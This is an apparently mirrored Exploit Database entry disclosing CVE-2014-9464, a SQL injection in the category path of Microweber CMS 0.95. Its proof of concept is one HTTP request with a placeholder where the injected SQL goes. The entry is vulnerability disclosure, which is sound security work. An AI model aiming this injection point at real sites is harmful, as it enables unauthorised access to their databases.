Microweber CMS 0.95 – SQL Injection

• Exploit Database
• 17 阅读

• 作者： Pham Kien Cuong
  日期： 2015-01-07
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/35720/

• # Exploit Title: SQL Injection in Microweber CMS 0.95
  # Google Dork: N/A
  # Date: 12/16/2014
  # Exploit Author: Pham Kien Cuong (cuong.k.pham@itas.vn) and ITAS Team (www.itas.vn)
  # Vendor Homepage: Microweber (https://microweber.com/)
  # Software Link: https://github.com/microweber/microweber
  # Version: 0.95
  # Tested on: N/A
  # CVE : CVE-2014-9464
  
  ::PROOF OF CONCEPT::
  
  GET /shop/category:[SQL INJECTION HERE] HTTP/1.1
  Host: target.org
  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: en-US,en;q=0.5
  Accept-Encoding: gzip, deflate
  Referer: http://target/shop
  Cookie: mw-time546209978=2015-01-05+05%3A19%3A53; PHPSESSID=48500cad98b9fa857b9d82216afe0275
  Connection: keep-alive
  
  ::REFERENCE::
  - http://www.itas.vn/news/itas-team-found-out-a-sql-injection-vulnerability-in-microweber-cms-69.html
  - https://www.youtube.com/watch?v=SSE8Xj_-QaQ
  - http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9464
  
  ::DISCLAIMER::
  THE INFORMATION PRESENTED HEREIN ARE PROVIDED ?AS IS? WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED TO, ANY IMPLIED WARRANTIES AND MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE OR WARRANTIES OF QUALITY OR COMPLETENESS. THE INFORMATION PRESENTED HERE IS A SERVICE TO THE SECURITY COMMUNITY AND THE PRODUCT VENDORS. ANY APPLICATION OR DISTRIBUTION OF THIS INFORMATION CONSTITUTES ACCEPTANCE ACCEPTANCE AS IS, AND AT THE USER'S OWN RISK.